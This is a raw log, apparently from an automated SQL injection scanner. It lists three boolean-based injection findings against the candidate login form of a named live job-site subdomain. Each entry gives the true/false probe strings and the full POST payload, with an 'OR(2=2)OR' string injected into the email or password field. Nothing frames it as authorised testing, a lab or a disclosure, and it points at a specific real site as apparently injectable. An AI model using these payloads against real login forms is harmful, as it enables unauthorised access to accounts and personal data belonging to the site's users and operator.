Url: https://nettformacion.ofertas-trabajo.infojobs.net/, Injection: InjectionType.Sqli_PostForm_Bool, Details: SqliManager bool FORM size! TRUE:'OR(1=1)OR' ; FALSE:'OR(1=2)OR', Payload: {'email': "'OR(2=2)OR'", 'password': '', 'permanentLogin': '0', 'fenl': '', 'j_clientId': 'empleo_ij', 'tipoLogin': 'candidato', 'accio': '', 'ret': ''}
Url: https://nettformacion.ofertas-trabajo.infojobs.net/, Injection: InjectionType.Sqli_PostForm_Bool, Details: SqliManager bool FORM size! TRUE:"OR(1=1)OR" ; FALSE:"OR(1=2)OR", Payload: {'email': '"OR(2=2)OR"', 'password': '', 'permanentLogin': '0', 'fenl': '', 'j_clientId': 'empleo_ij', 'tipoLogin': 'candidato', 'accio': '', 'ret': ''}
Url: https://nettformacion.ofertas-trabajo.infojobs.net/, Injection: InjectionType.Sqli_PostForm_Bool, Details: SqliManager bool FORM size! TRUE:"OR(1=1)OR" ; FALSE:"OR(1=2)OR", Payload: {'email': '', 'password': '"OR(2=2)OR"', 'permanentLogin': '0', 'fenl': '', 'j_clientId': 'empleo_ij', 'tipoLogin': 'candidato', 'accio': '', 'ret': ''}
